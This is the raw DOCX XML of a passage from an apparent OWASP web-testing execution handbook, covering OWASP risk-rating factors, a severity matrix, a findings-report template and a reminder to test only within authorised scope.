      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Once a test confirms a genuine finding, its severity should be scored using the OWASP Risk Rating methodology (reflected in the source workbook's Risk Assessment Calculator sheet) rather than assigned by gut feeling. This produces defensible, consistent severity ratings across the whole assessment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Likelihood Factors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Threat Agent Factors — Skill level required, Motive, Opportunity, Population size (who can reach this).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Factors — Ease of discovery, Ease of exploit, Awareness, Intrusion detection likelihood.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="260"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact Factors</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Technical Impact — Loss of confidentiality, integrity, availability, and accountability.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Business Impact — Financial damage, reputational damage, non-compliance exposure, privacy violation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Each factor is scored 0–9; the average of the Likelihood factors and the average of the Impact factors are each plotted (Low / Medium / High) on the standard OWASP risk matrix to derive an overall severity of Low, Medium, High, or Critical.</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2275"/>
        <w:gridCol w:w="2275"/>
        <w:gridCol w:w="2275"/>
        <w:gridCol w:w="2275"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Likelihood \ Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="70"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="70"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="333333"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1F3864" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="180" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix B: Findings Report Template</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Every confirmed finding should be logged using the same fields as the source checklist's Summary Findings sheet, ensuring traceability from raw test execution through to the client-facing report:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">No. — sequential finding number.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Name — plain-language name of the issue.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">OTG Reference — the specific OTG-ID this finding maps to (e.g., OTG-INPVAL-005).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Affected Host/Path — exact URL, parameter, or endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact / Likelihood / Risk — scored per Appendix A.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Observation/Implication — what was observed and what it means for the business.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Recommendation — specific, actionable remediation (draw from each test's Remediation section in this handbook).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="70"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Test Evidence — reference to screenshots, raw requests/responses, or tool output supporting the finding.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="300"/>
      </w:pP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DCE6F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="130"/>
              <w:left w:type="dxa" w:w="170"/>
              <w:bottom w:type="dxa" w:w="130"/>
              <w:right w:type="dxa" w:w="170"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="50"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1F3864"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Reminder</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:color w:val="333333"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">This handbook is a testing methodology reference. It must only be applied within the scope and duration explicitly authorized in a signed engagement agreement or rules of engagement document.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId33"/>
      <w:footerReference w:type="default" r:id="rId34"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>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r>
      <w:rPr>
        <w:color w:val="999999"/>
        <w:sz w:val="15"/>
        <w:szCs w:val="15"/>
      </w:rPr>
      <w:t xml:space="preserve"> of </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:color w:val="9999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OWASP Testing Guide v4 — Execution Handbook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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution Handbook</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OWASP Testing Guide v4 — Execution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2026-09-23T20:54:14.929Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-23T20:54:14.939Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>